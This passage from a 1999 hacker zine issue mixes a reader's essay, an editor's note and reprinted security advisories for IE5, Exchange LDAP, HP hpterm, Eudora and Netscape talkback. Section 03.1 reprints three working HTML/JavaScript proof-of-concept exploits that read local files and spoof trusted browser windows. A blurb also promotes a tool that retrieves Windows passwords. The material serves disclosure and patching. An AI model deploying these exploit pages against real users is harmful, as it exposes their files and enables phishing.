  742.     +++ When was the last time you backed up your important data?
  743.     
  744.     
  745.     
  746.    ++ Attrition has updated its archive of cracked sites with one
  747.       of the biggest archives on the net http://www.attrition.org
  748.       check it out ... 
  749.            
  750.  
  751.     
  752.      Mucho thanks to Spikeman for directing his efforts to our cause of bringing
  753.      you the news we want to read about in a timely manner ... - Ed
  754.  
  755.      @HWA
  756.  
  757.  01.2 MAILBAG - email and posts from the message board worthy of a read
  758.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  759.  
  760.        Yes we really do get a pile of mail in case you were wondering ;-0
  761.        heres a sampling of some of the mail we get here, the more interesting
  762.        ones are included and of course we had to get in the plugs for the 
  763.        zine coz we love to receive those too *G* - Ed
  764.        
  765.        
  766.        
  767.        
  768.        This is "off-topic" but its something I thought i'd share with the readers
  769.        if you have any comments on the writing i'd like to hear them and so would
  770.        phiregod so give us an email, we need more writers like this to bring a 
  771.        dose of reality to our lives now and then... - Cruciphux@dok.org
  772.        
  773.        
  774.        From: "liquid phire" <liquidphire@hotmail.com> 
  775.        To: cruciphux@dok.org 
  776.        Subject: a new one 
  777.        Date: Tue, 23 Mar 1999 19:04:34 PST 
  778.        Mime-Version: 1.0 
  779.        Content-type: text/plain 
  780.        
  781.        <snip>
  782.        
  783.        when i watch tv all i see are commercials for heartburn stuffs, what is 
  784.        with that? are the subjects of american culture rotting from the inside 
  785.        out? did their bodies realize their sins before their minds did? is this 
  786.        happening with everyone?
  787.        
  788.        
  789.        the world is going downhill fast, and we wont find out until we hit the 
  790.        bottom whether or not our air bags will work. this is a new car 
  791.        commercial, gaudy and loud, "buy or die!" they scream from their tabloid 
  792.        pulpits. our churches have turned into department stores, the very 
  793.        children that are our hope are selling their lives out for a dime bag 
  794.        and a place to stay. we dress in jail rags, chant the rants of the very 
  795.        people that are bringing this psuedo-life to its knees.
  796.        
  797.        
  798.        athletes are yelling the rhymes of corporations at anyone who will 
  799.        listen. our heros are not fighting for equality or freedom, they are 
  800.        throwing hype out about cop killers and hits of coke. you cant eat 
  801.        money, you cant take it with you when you die, and it sure as hell wont 
  802.        stop a bullet. 
  803.        
  804.        
  805.        america is the prostitute of the free and imprisoned world, thousands 
  806.        died so we can enjoy cable from our matching houses with our matching 
  807.        lives. god is for those who are wasting their lives and need another one 
  808.        to spare. we fought for what now? so that rapists and murderers could 
  809.        walk free while political prisoners rotted in their cells?
  810.        
  811.        
  812.        parents work all day so their children can attend public schools that 
  813.        promote insecurity and train the next generation to be faceless and 
  814.        money driven. the smart are encouraged to work for large companies or 
  815.        military services, the down of luck are pushed into low paying jobs and 
  816.        inferior lives. the country will prosper and a revolution will be 
  817.        breathing down our necks.
  818.        
  819.        
  820.        i missed the sermon with the explanation, the end is near and the lord 
  821.        saves. mc donalds will cater the apocalypse, and nike will provide the 
  822.        offical shoe. god sold out to miramax for the film, tarantino has 
  823.        claimed the screenplay, and look out for the soundtrack by backstreet 
  824.        boys. salvation is being sold with an order of fries, healing comes with 
  825.        a free drink, faith by armani.
  826.        
  827.        
  828.        the angels have encountered a glass ceiling, sexual harassment 
  829.        allegations in hell, the government has become "nightly action news". 
  830.        blood and gore, right and wrong, good and bad, pleasure and pain 
  831.        extremes are desired in a moderated world. the second coming will have 
  832.        its own line of clothes, the blood of the lamb is copyrighted. heaven 
  833.        and the inferno have merged and the NASDAQ is reaching all time highs.
  834.        
  835.        
  836.        justice has been fucked over, her sword carried off and her measures 
  837.        used for heroin. the flag is used as a doormat in other countries, our 
  838.        anthem sung by drunk veterans in the middle of the night. this feels 
  839.        like a moment of revelation, but its just another day in Las Vegas. 
  840.        
  841.        
  842.        i wake up in the middle of the night screaming for solace, i cry for a 
  843.        calm sea and a worthy ship. like a panther truth runs through the 
  844.        sleeping city, merging with the gray and spreading over the streets in 
  845.        lies. we are grasping ever bit of cabbie wisdom we can find, slipping 
  846.        over the edge trying to hold on to religion, government, and "family". 
  847.        we have a thirst that encompasses our lives, and it can only be quenched 
  848.        with blood.
  849.        
  850.        
  851.        "i am the alpha and the omega, the begining and the end." i dont 
  852.        remember if it was jesus or bill gates that said that.
  853.        
  854.        
  855.        please excuse all grammer/spelling mistakes.
  856.        phiregod
  857.        liquidphire@hotmail.com
  858.        www.geocities.com/siliconvalley/sector/4121
  859.        Get Your Private, Free Email at http://www.hotmail.com
  860.        
  861.  
  862.        ================================================================       
  863.  
  864.       @HWA
  865.  
  866.  
  867.   02.0  From the editor.#9
  868.         ~~~~~~~~~~~~~~~~~~
  869.  
  870.      #include <stdio.h>
  871.      #include <thoughts.h>
  872.      #include <backup.h>
  873.  
  874.      main()
  875.      {
  876.       printf ("Read commented source!\n\n");
  877.  
  878.      /*
  879.       *So Mircosoft continues to suck, the released IE5 (wooHOO)
  880.       *and whaddya know it still has a slew of bugs duh...all those
  881.       *frame spewfing bugs and other java monsters are still in there
  882.       *so I hope u guys that keep hitting the site with MSIE will 
  883.       *begin to smarten up and see that Netscape although not the
  884.       *most secure program either is a damn sight better than MSIE
  885.       *even on a bad day ... peace out rockin with issue 11 
  886.       *
  887.       */
  888.       printf ("EoF.\n");
  889.       }
  890.  
  891.  
  892.       Congrats, thanks, articles, news submissions and kudos to us at the
  893.      main address: hwa@press.usmc.net complaints and all nastygrams and
  894.      mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
  895.      127.0.0.1, private mail to cruciphux@dok.org
  896.  
  897.      danke.
  898.  
  899.      C*:.
  900.  
  901.  
  902.      @HWA
  903.      
  904.  03.0  MSIE 5 is still susceptible to frame spoofing and other bugs
  905.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  906.        
  907.        Date: Fri, 19 Mar 1999 11:46:01 +0100
  908.        From: Most Psychoid <psychoid@GMX.NET>
  909.        To: BUGTRAQ@netspace.org
  910.        Subject: IE5 - same vulnerabilities, only some fixed
  911.        
  912.        Hello,
  913.        
  914.        The new Microsoft Internet Explorer 5 (I checked Version: 5.00.0910.1309)
  915.        still allows Frame Spoofing and reading of local Files as described by
  916.        Georgi Guninski (see http://www.whitehats.com/guninski/read.html).
  917.        
  918.        Another new feature named "AutoComplete" stores entries (which also may be
  919.        passwords). Just another new source for passwords which had not been saved
  920.        in IE 4.x.
  921.        
  922.        The Crash-bugs seem to be removed. I could not crash my default installed
  923.        IE 5 using the known exploits.
  924.        
  925.        So far,
  926.        
  927.        psychoid
  928.        
  929.        ---
  930.        Sent through Global Message Exchange - http://www.gmx.net
  931.        
  932.  03.1 MSIE 5 problems carried over from earlier versions
  933.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  934.  
  935.        There is a Javascript security bug in Internet Explorer 4.x (patched), 
  936.        which circumvents "Cross-frame security" and opens several security holes. 
  937.        
  938.        The problem is: if you add '%01someURL' after an 'about:somecode' URL, IE thinks that the document is 
  939.        loaded from the domain of 'someURL'. Very strange? 
  940.        
  941.        Some of the bugs are: 
  942.        
  943.        1) IE allows reading local files and sending them to an arbitrary server. 
  944.        The filename must be known. 
  945.        The bug may be exploited using HTML mail message. 
  946.        Demo is available (See Demos below)
  947.        
  948.        2) IE allows "window spoofing". 
  949.        After visiting a hostile page (or clicking a hostile link) a window is opened and its 
  950.        location is a trusted site. However, the content of the window is not that of the original site, 
  951.        but it is supplied by the owner of the page. So, the user is misled he is browising 
  952.        a trusted site, while he is browsing a hostile page and may provide sensitive information, 
  953.        such as credit card number. 
  954.        The bug may be exploited using HTML mail message. 
  955.        Demo is available (See below)
  956.        
  957.        3) Reading AUTOEXEC.BAT using TDC. 
  958.        Demo is available: (See below)
  959.        
  960.        Workaround: Disable Javascript 
  961.        
  962.        
  963.        Demo #1
  964.        
  965.        <HTML>
  966.        <HEAD><TITLE>
  967.        Guninski's IE 4 file reading bug.
  968.        </TITLE>
  969.        </HEAD>
  970.        
  971.        <BODY>
  972.        There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
  973.        <BR>
  974.        The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
  975.        <BR>
  976.        This circumvents "Cross-frame security" and opens several security holes.
  977.        <BR>
  978.        
  979.        The filename must be known.
  980.        <BR>
  981.        The bug may be exploited using HTML mail message. The exploit uses Javascript. 
  982.        For more info see the source.
  983.        <BR>
  984.        Workaround: Disable Javascript.
  985.        <BR>
  986.        
  987.        
  988.        
  989.        <SCRIPT>
  990.        
  991.        alert('Create a short file C:\\test.txt and its contents will be shown in a dialog box.')
  992.        b=showModalDialog("about:<SCRIPT>a=window.open('file://c:/test.txt');s='Here is your file: \\n\\n'+a.document.body.innerText;alert(s);a.close();close()</"+"SCRIPT>%01file://c:/");
  993.        
  994.        </SCRIPT>
  995.        
  996.        <A HREF="http://www.whitehats.com/guninski">Go to Georgi Guninski's home page.</A>
  997.        
  998.        </BODY>
  999.        </HTML>
  1000.        
  1001.        Demo #2
  1002.        
  1003.        <HTML>
  1004.        <HEAD><TITLE>
  1005.        Guninski's IE 4 window spoofing.
  1006.        </TITLE>
  1007.        </HEAD>
  1008.        
  1009.        <BODY>
  1010.        There is a bug in Internet Explorer 4.x (patched) which allows "window spoofing".
  1011.        <BR>
  1012.        The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
  1013.        <BR>
  1014.        This circumvents "Cross-frame security" and opens several security holes.
  1015.        <BR>
  1016.        <BR>
  1017.        After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site.
  1018.        However, the content of the window is not that of the original site, but it is supplied by the owner of the page.
  1019.        So, the user is mislead he is browising a trusted site, 
  1020.        while he is browsing a hostile page and may provide sensitive information, such as credit card number.
  1021.        <BR>
  1022.        The bug may be exploited using HTML mail message. The exploit uses Javascript. 
  1023.        <BR>
  1024.        Workaround: Disable Javascript.
  1025.        <BR>
  1026.        
  1027.        
  1028.        <SCRIPT>
  1029.        
  1030.        alert('A window will be open. Examine the location and the content.\nThis may also be done by clicking a link.')
  1031.        b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look at the address bar!<BR>');a.document.write('<A HREF=\"http://www.whitehats.com/guninski\">Go to Georgi Guninski\\'s home page</A></H1></BODY></HTML>');close()</"+"SCRIPT>%01http://www.yahoo.com");
  1032.        
  1033.        </SCRIPT>
  1034.        <A HREF="http://www.whitehats.com/guninski">Go to Georgi Guninski's home page.</A>
  1035.        
  1036.        </BODY>
  1037.        </HTML>
  1038.        
  1039.        
  1040.        Demo #3
  1041.        
  1042.        <HTML>
  1043.        <HEAD><TITLE>
  1044.        Guninski's IE 4 reading AUTOEXEC.BAT.
  1045.        </TITLE>
  1046.        </HEAD>
  1047.        
  1048.        <BODY>
  1049.        There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
  1050.        <BR>
  1051.        The problem is: if you add '%01someURL' after the an about: URL, IE thinks that the document is loaded from the domain of 'someURL'.
  1052.        <BR>
  1053.        This circumvents "Cross-frame security" and opens several security holes.
  1054.        <BR>
  1055.        
  1056.        This will try to read C:\AUTOEXEC.BAT using TDC.
  1057.        <BR>
  1058.        The bug may be exploited using HTML mail message. The exploit uses Javascript. 
  1059.        For more info see the source.
  1060.        <BR>
  1061.        <BR>
  1062.        Workaround: Disable Javascript.
  1063.        <BR>
  1064.        
  1065.        <SCRIPT>
  1066.        
  1067.        alert('This tries to read your AUTOEXEC.BAT\nWait few seconds.')
  1068.        
  1069.        s="about:<SCRIPT>a=window.open('view-source:x');a.document.open();a.document.write(\"<object id='myTDC' width=100 height=100 classid='CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83'>"
  1070.        +"<param name='DataURL' value='c:/autoexec.bat'><param name='UseHeader' value=False><param name='CharSet' VALUE='iso-8859-1'><param name='FieldDelim' value='}'><param name='RowDelim' value='}'><param name='TextQualifier' value='}'>"
  1071.        +"</object><form><textarea datasrc='#myTDC' datafld='Column1' rows=10 cols=80></textarea></form>\");a.document.write('<SCRIPT>setTimeout(\"alert(document.forms[0].elements[0].value)\",4000)</SCRIPT');a.document.write('>');a.document.close();close()</"+"SCRIPT>%01file://c:/";
  1072.        
  1073.        
  1074.        b=showModalDialog(s);
  1075.        
  1076.        </SCRIPT>
  1077.        <A HREF="http://www.whitehats.com/guninski">Go to Georgi Guninski's home page.</A>
  1078.        
  1079.        </BODY>
  1080.        </HTML>
  1081.        
  1082.        
  1083.        This was reported in an earlier version and last issue of the zine but is included
  1084.        here for new readers whom may be unaware or have not read the earlier issues. - Ed
  1085.  
  1086.        
  1087.  
  1088.  04.0  Wintrasher GOLD
  1089.        ~~~~~~~~~~~~~~~
  1090.        
  1091.       This program bears some looking at, when I first saw it on packetstorm
  1092.       I thought the same thing i thought when I first heard of Genius's 
  1093.       release and thats pure scepticism, anyways I checked it out and its
  1094.       pretty damn cool you might want to check it out too, 1.6M heres the
  1095.       blurb from packetstorm:
  1096.        
  1097.        
  1098.       Wintrasher GOLD v5.2 - Wintrasher is a powerful utility that can be ussed to configure hidden Windows settings, acting as
  1099.       a Windows Shell and Desktop Management Tool. Many of the settings that change the way Windows works and looks are
  1100.       hidden in the overwhelming registry, or in configuration files. WT-GOLD gives you an easy way to configure those settings.
  1101.       This version also includes, backup of critical system files, improved active desktop-calendar, popup-reminder, and much
  1102.       much more. Features: Get you computer to start in pure DOS again. Change the shortcut arrow to whatever you want.
  1103.       Check your files for changes at startup, and prevent infection by unknown viruses. Log file editor, to View/Edit/Clear all
  1104.       your Windows log files from one program. (improved from the PRO version). Personalize your Desktop pictures. Change
  1105.       the Windows 9x folder structure. Watch what the uninstall programs call, when they launch, create your own and remove
  1106.       any you don't want. Watch what windows launches behind your back. (Edit/Remove/Insert) Change the layout of your
  1107.       Deskop, and some of it's features. Clear your history files when leaving Windows. Log logins at startup. Change your
  1108.       registration information. Forgot your password to Windows9x? Retrieve or remove the password files directly. Got a habit of
  1109.       forgetting stuff? The Wintrasher Calendar & Popup is with you every time you start Windows. Has your system ever
  1110.       crashed, or ever wished that you didn't install that program? The system backup feature backs up critical system files,
  1111.       including the Registry. Lock your system as with Windows NT with one click. Make sure you are the only one that can
  1112.       use Wintrasher at the station, by password-protecting WT-Gold. For Windows 95/98. 1.6 MB. By The Silents Denmark. 
  1113.       
  1114.       Packetstorm download:
  1115.       
  1116.        http://www.genocide2600.com/~tattooman/utility-nt/wtgold.zip
  1117.       
  1118.       Main site:
  1119.       
  1120.        http://www.silents.dk/              
  1121.  
  1122.  05.0  LDAP buffer overflow
  1123.        ~~~~~~~~~~~~~~~~~~~~~
  1124.  
  1125.        From: X-Force <xforce@iss.net>
  1126.        To: BUGTRAQ@netspace.org <BUGTRAQ@netspace.org>
  1127.        Subject:  ISS Security Advisory: LDAP Buffer overflow against Microsoft             Directory Services
  1128.        Date: 1999. oujak 16 22:03
  1129.        
  1130.        -----BEGIN PGP SIGNED MESSAGE-----
  1131.        
  1132.        ISS Security Advisory
  1133.        March 15, 1999
  1134.        
  1135.        LDAP Buffer overflow against Microsoft Directory Services
  1136.        
  1137.        Synopsis:
  1138.        
  1139.        ISS X-Force has discovered a buffer overflow exploit against Microsoft
  1140.        Exchange's LDAP (Lightweight Directory Access Protocol) server which
  1141.        allows read access to the Exchange server directory by using an LDAP
  1142.        client.  This buffer overflow consists of a malformed bind request that
  1143.        overflows the buffer and can execute arbitrary code. This attack can also
  1144.        cause the Exchange LDAP service to crash. This vulnerability exists in
  1145.        Microsoft Exchange Server version 5.5.
  1146.        
  1147.        Description:
  1148.        
  1149.        This exploit occurs during the LDAP binding process. Binding involves
  1150.        logging in or authenticating to a directory, and consists of sending a
  1151.        username, a password, and a binding method. There are two methods in
  1152.        which to use this vulnerablility against an Exchange server. The first
  1153.        consists of sending a particular type of invalid LDAP bind packet which
  1154.        will cause an overflow to occur this will cause the LDAP service to crash.
  1155.        The second uses a large malformed LDAP bind packet that is carefully
  1156.        crafted to take advantage of the buffer overflow and can be used to
  1157.        execute arbitrary code.
  1158.        
  1159.        Recommendations:
  1160.        
  1161.        Microsoft has made a patch available for the LDAP attack.  Patch
  1162.        information is available at:
  1163.        http://www.microsoft.com/security/bulletins/ms99-009.asp
  1164.        
  1165.        Network administrators can protect internal systems from external attack
  1166.        by adding a rule to a filtering router or firewall of the type: Deny all
  1167.        incoming TCP packets with a destination port of 389.
  1168.        
  1169.        Many firewalls or packet filters may already have more restrictive
  1170.        rulesets that already encompass this filtering rule, in which case the
  1171.        network is already protected from an external attack.  This ruleset would
  1172.        include filtering all incoming traffic to TCP port 389.
  1173.        
  1174.        Additional Information:
  1175.        
  1176.        These vulnerabilities were primarily researched by the ISS X-Force.
  1177.        
  1178.        ________
  1179.        
  1180.        Copyright (c) 1999 by Internet Security Systems, Inc.
  1181.        
  1182.        Permission is hereby granted for the electronic redistribution of this
  1183.        Security Advisory.  It is not to be edited in any way without express
  1184.        consent of the X-Force.  If you wish to reprint the whole or any part of
  1185.        this Security Advisory in any other medium excluding electronic medium,
  1186.        please e-mail xforce@iss.net for permission.
  1187.        
  1188.        Internet Security Systems, Inc. (ISS) is the leading provider of adaptive
  1189.        network security monitoring, detection, and response software that
  1190.        protects the security and integrity of enterprise information systems.  By
  1191.        dynamically detecting and responding to security vulnerabilities and
  1192.        threats inherent in open systems, ISS's SAFEsuite family of products
  1193.        provide protection across the enterprise, including the Internet,
  1194.        extranets, and internal networks, from attacks, misuse, and security
  1195.        policy violations.  ISS has delivered its adaptive network security
  1196.        solutions to organizations worldwide, including firms in the Global 2000,
  1197.        nine of the ten largest U.S. commercial banks, and over 35 governmental
  1198.        agencies.  For more information, call ISS at 678-443-6000 or 800-776-2362
  1199.        or visit the ISS Web site at http://www.iss.net.
  1200.        
  1201.        Disclaimer
  1202.        The information within this paper may change without notice. Use of this
  1203.        information constitutes acceptance for use in an AS IS condition. There
  1204.        are NO warranties with regard to this information. In no event shall the
  1205.        author be liable for any damages whatsoever arising out of or in
  1206.        connection with the use or spread of this information. Any use of this
  1207.        information is at the user's own risk.
  1208.        
  1209.        X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as
  1210.        well as on MIT's PGP key server and PGP.com's key server.
  1211.        
  1212.        X-Force Vulnerability and Threat Database: http://www.iss.net/xforce
  1213.        
  1214.        Please send suggestions, updates, and comments to:
  1215.        X-Force <xforce@iss.net> of Internet Security Systems, Inc.
  1216.        
  1217.        -----BEGIN PGP SIGNATURE-----
  1218.        Version: 2.6.3a
  1219.        Charset: noconv
  1220.        
  1221.        iQCVAwUBNu3GuzRfJiV99eG9AQF48wP+J1/vW040sA5f9Nz56JEF9s6d/tpainG1
  1222.        Qw7Jxbry374IFinJZfk/K5FJkdbjJfMcyGfgWJjNriYZJ0EKFkQcRK7XNAUe8AGu
  1223.        LWaBW4l0v1Qox3ueR3GdCskQ8haK9vpxkFkbPmlefIWKMsVhncQPloJwU3/WyPNV
  1224.        uLJBWqHEpkU=
  1225.        =Zp+/
  1226.        -----END PGP SIGNATURE-----
  1227.      
  1228.        From Help Net Security
  1229.        http://net-security.org/
  1230.     
  1231.        PATCH FOR "MALFORMED BIND REQUEST" 
  1232.        by BHZ, Wednesday 17th Mar 1999 on 8:40 pm CET
  1233.        Microsoft has released a patch that eliminates a vulnerability in the LDAP Bind function for Microsoft (r)
  1234.        Exchange (r) 5.5. The vulnerability could allow denial of service attacks against an Exchange server or, under
  1235.        certain conditions, could allow arbitrary code to be run on the server. A fully supported patch is available, and
  1236.        Microsoft recommends that customers who are at risk from this attack download and install it. You can
  1237.        obtain patch for X86-based Exchange or Alpha-based Exchange                
  1238.        
  1239.        @HWA
  1240.  
  1241.  06.0  HP Security bulletin: HPTerm exploitability
  1242.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1243.       
  1244.        Date: Thu, 18 Mar 1999 12:36:13 -0800
  1245.        From: aleph1@UNDERGROUND.ORG
  1246.        Reply-To: support_feedback@us-support.external.hp.com
  1247.        To: BUGTRAQ@netspace.org
  1248.        Subject: Security Bulletins Digest
  1249.        
  1250.                                HP Support Information Digests
  1251.        
  1252.        ===============================================================================
  1253.        o  HP Electronic Support Center World Wide Web Service
  1254.           ---------------------------------------------------
  1255.        
  1256.           If you subscribed through the HP Electronic Support Center and would
  1257.           like to be REMOVED from this mailing list, access the
  1258.           HP Electronic Support Center on the World Wide Web at:
  1259.        
  1260.             http://us-support.external.hp.com
  1261.        
  1262.           Login using your HP Electronic Support Center User ID and Password.
  1263.           Then select Support Information Digests.  You may then unsubscribe from the
  1264.           appropriate digest.
  1265.        ===============================================================================
  1266.        
  1267.        ?
  1268.        Digest Name:  Daily Security Bulletins Digest
  1269.            Created:  Thu Mar 18  3:00:02 PST 1999
  1270.        
  1271.        Table of Contents:
  1272.        
  1273.        Document ID      Title
  1274.        ---------------  -----------
  1275.        HPSBUX9903-093   Security Vulnerability with hpterm on HP-UX 10.20
  1276.        
  1277.        The documents are listed below.
  1278.        -------------------------------------------------------------------------------
  1279.        
  1280.        ?
  1281.        Document ID:  HPSBUX9903-093
  1282.        Date Loaded:  19990317
  1283.              Title:  Security Vulnerability with hpterm on HP-UX 10.20
  1284.        
  1285.        -------------------------------------------------------------------------
  1286.            HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00093, 18 March 1999
  1287.        -------------------------------------------------------------------------
  1288.        
  1289.         The information in the following Security Bulletin should be acted upon
  1290.         as soon as possible.  Hewlett-Packard Company will not be liable for any
  1291.         consequences to any customer resulting from customer's failure to fully
  1292.         implement instructions in this Security Bulletin as soon as possible.
  1293.        
  1294.        -------------------------------------------------------------------------
  1295.        PROBLEM:   PHSS_13560 introduced a library access problem into hpterm.
  1296.        
  1297.        PLATFORM:  HP9000 Series 700 and Series 800, HP-UX release 10.20 only.
  1298.        
  1299.        DAMAGE:    Users can gain increased privileges.
  1300.        
  1301.        SOLUTION:  Install PHSS_17830.
  1302.        
  1303.        AVAILABILITY:  The patch is available now.
  1304.        
  1305.        -------------------------------------------------------------------------
  1306.        I.
  1307.           A. Background
  1308.        
  1309.              PHSS_13560 introduced a library access problem into hpterm, the
  1310.              terminal emulator for the X Window system. (See hpterm(1)).
  1311.        
  1312.           B. Fixing the problem
  1313.        
  1314.              Installing patch PHSS_17830 completely fixes this problem.
  1315.        
  1316.              NOTE: Three older hpterm patches have been released including
  1317.              PHSS_13560, PHSS_15431, and PHSS_17332.  All of these older
  1318.              patches are being superseded with the release of the
  1319.              PHSS_17830.
  1320.        
  1321.              Do not use PHSS_13560, PHSS_15431, or PHSS_17332.
  1322.        
  1323.        
  1324.           C. To subscribe to automatically receive future NEW HP Security
  1325.              Bulletins from the HP Electronic Support Center via electronic
  1326.              mail, do the following:
  1327.        
  1328.              Use your browser to get to the HP Electronic Support Center page
  1329.              at:
  1330.        
  1331.                http://us-support.external.hp.com
  1332.                       (for US, Canada, Asia-Pacific, & Latin-America)
  1333.                http://europe-support.external.hp.com     (for Europe)
  1334.        
  1335.              Login with your user ID and password (or register for one).
  1336.              Remember to save the User ID assigned to you, and your password.
  1337.              Once you are in the Main Menu:
  1338.              To -subscribe- to future HP Security Bulletins,
  1339.                click on "Support Information Digests".
  1340.              To -review- bulletins already released from the main Menu,
  1341.                click on the "Technical Knowledge Database (Security Bulletins
  1342.                only)".
  1343.              Near the bottom of the next page, click on "Browse the HP Security
  1344.              Bulletin Archive".
  1345.        
  1346.              Once in the archive there is another link to our current Security
  1347.              Patch Matrix.  Updated daily, this matrix categorizes security
  1348.              patches by platform/OS release, and by bulletin topic.
  1349.        
  1350.               The security patch matrix is also available via anonymous ftp:
  1351.        
  1352.               us-ffs.external.hp.com
  1353.               ~ftp/export/patches/hp-ux_patch_matrix
  1354.        
  1355.            D. To report new security vulnerabilities, send email to
  1356.        
  1357.               security-alert@hp.com
  1358.        
  1359.               Please encrypt any exploit information using the security-alert
  1360.               PGP key, available from your local key server, or by sending a
  1361.               message with a -subject- (not body) of 'get key' (no quotes) to
  1362.               security-alert@hp.com.
  1363.        
  1364.              Permission is granted for copying and circulating this Bulletin to
  1365.              Hewlett-Packard (HP) customers (or the Internet community) for the
  1366.              purpose of alerting them to problems, if and only if, the Bulletin
  1367.              is not edited or changed in any way, is attributed to HP, and
  1368.              provided such reproduction and/or distribution is performed for
  1369.              non-commercial purposes.
  1370.        
  1371.              Any other use of this information is prohibited. HP is not liable
  1372.              for any misuse of this information by any third party.
  1373.        _______________________________________________________________________
  1374.        -----End of Document ID:  HPSBUX9903-093--------------------------------------
  1375.        
  1376.        
  1377.        @HWA
  1378.        
  1379.  07.0  Eudora buffer overflow exploit
  1380.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1381.        
  1382.        Approved-By: aleph1@UNDERGROUND.ORG 
  1383.        Received: from enext.dyndns.org (port25.mico10.tir.com [216.40.137.210]) by 
  1384.                  netspace.org (8.8.7/8.8.7) with ESMTP id CAA18560 for 
  1385.                  <BUGTRAQ@netspace.org>; Sat, 20 Mar 1999 02:17:38 -0500 
  1386.        Received: from localhost (whiz@localhost) by enext.dyndns.org (8.8.7/8.8.7) 
  1387.                  with ESMTP id CAA12075 for <BUGTRAQ@netspace.org>; Sat, 20 Mar 1999 
  1388.                  02:21:35 -0500 
  1389.        MIME-Version: 1.0 
  1390.        Content-Type: TEXT/PLAIN; charset=US-ASCII 
  1391.        Message-ID: <Pine.LNX.4.04.9903200215340.12022-100000@enext.dyndns.org> 
  1392.        Date:   Sat, 20 Mar 1999 02:21:35 -0500 
  1393.        Reply-To: whiz <whiz@ENEXT.DYNDNS.ORG> 
  1394.        Sender: Bugtraq List <BUGTRAQ@netspace.org> 
  1395.        From: whiz <whiz@ENEXT.DYNDNS.ORG> 
  1396.        Subject:      Eudora Attachment Buffer Overflow 
  1397.        To: BUGTRAQ@netspace.org 
  1398.        
  1399.        
  1400.        I have found another problem with Eudora, attachments, and long filenames that
  1401.        is similar to the the problem I found last year.
  1402.        
  1403.        
  1404.        If two messages are sent to an Eudora 4.1 user that have an attachment with a
  1405.        filename of around 231 or more, the next time the user checkes his mail Eudora
  1406.        crashes.  I say 231 because C:\Program Files\Eudora\Attach\ is 31 characters +
  1407.        231 = 262 = longer then Windows can handle.
  1408.        
  1409.        
  1410.        Eudora trucates the long filename correctly and thats why you cant't send just
  1411.        one messages with a long name, like you use to be able to do with Eudora 4.0.
  1412.        But it truncates it so the the path length is 259 characters which is the
  1413.        maximum.  Then when it receives the second attachment it truncates, and trys to
  1414.        add a 1 to the end, this is where it crashes.  This allows you to modify the
  1415.        return address to point to arbitrary code.
  1416.        
  1417.        
  1418.        Here is how i tested:
  1419.        Send message to myself with attchment that has a long filename
  1420.        Resend exact message
  1421.        Check my mail
  1422.        Eudora crashes
  1423.        
  1424.        
  1425.        Both the Win 95 and Win NT versions, along with the 4.2 beta of Eudora are
  1426.        affected.
  1427.        
  1428.        
  1429.        The vendor of Eudora, Qualcomm was notified of this problem on 3/12/99.
  1430.        
  1431.        
  1432.        -whiz
  1433.        whiz@enext.dyndns.org
  1434.        http://enext.dyndns.org/~whiz/
  1435.        
  1436.        @HWA
  1437.        
  1438.  08.0  Netscape SUSE crash exploit
  1439.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1440.        
  1441.        Return-Path: <owner-bugtraq@netspace.org> 
  1442.        Approved-By: aleph1@UNDERGROUND.ORG 
  1443.        Date:   Fri, 19 Mar 1999 22:45:02 -0800 
  1444.        Reply-To: Aleph One <aleph1@UNDERGROUND.ORG> 
  1445.        Sender: Bugtraq List <BUGTRAQ@netspace.org> 
  1446.        From: Aleph One <aleph1@UNDERGROUND.ORG> 
  1447.        Subject:      Security hole in Netscape Communicator's 4.5 "talkback" function 
  1448.        To: BUGTRAQ@netspace.org 
  1449.        
  1450.        
  1451.        ______________________________________________________________________________
  1452.        
  1453.        
  1454.                                SuSE Security Announcement
  1455.        
  1456.        
  1457.                Package:  netscape-4.5-9
  1458.                Date:     Thu Mar 18 10:22:11 CET 1999
  1459.                Affected: unix operating systems using netscape communicator 4.5
  1460.        
  1461.        
  1462.        ______________________________________________________________________________
  1463.        
  1464.        
  1465.        A security whole was discovered in the package mentioned above.
  1466.        Please update as soon as possible or disable the service if you are using
  1467.        this software on your SuSE Linux installation(s).
  1468.        
  1469.        
  1470.        Other Linux distributions or operating systems might be affected as
  1471.        well, please contact your vendor for information about this issue.
  1472.        
  1473.        
  1474.        Please note, that that we provide this information on as "as-is" basis only.
  1475.        There is no warranty whatsoever and no liability for any direct, indirect or
  1476.        incidental damage arising from this information or the installation of
  1477.        the update package.
  1478.        
  1479.        
  1480.        ______________________________________________________________________________
  1481.        
  1482.        
  1483.        1. Problem Description
  1484.        
  1485.        
  1486.            The Netscape Communicator 4.5 comes with "talkback", a quality
  1487.            enhancement tool by Fullcircle (www.fullcircle.com).
  1488.            If the communicator crashs for any reason, the file with the
  1489.            name
  1490.        
  1491.        
  1492.        /tmp/.$UID.talkback
  1493.            is read in, and the pid in this file is killed.
  1494.            After that, the file is truncated/created without checks for
  1495.            {sym|hard}links and the pid of the current talkback process is
  1496.            written into the file.
  1497.        
  1498.        
  1499.        2. Impact
  1500.        
  1501.        
  1502.            Anyone on the system can kill a process of users if their communicator
  1503.            crashs.
  1504.            Anyone on the system can overwrite/create any file an attacked users#
  1505.            has write access to.
  1506.            We didn't check if there's a buffer overflow possible when the talkback
  1507.            application reads in the file.
  1508.        
  1509.        
  1510.        3. Solution
  1511.        
  1512.        
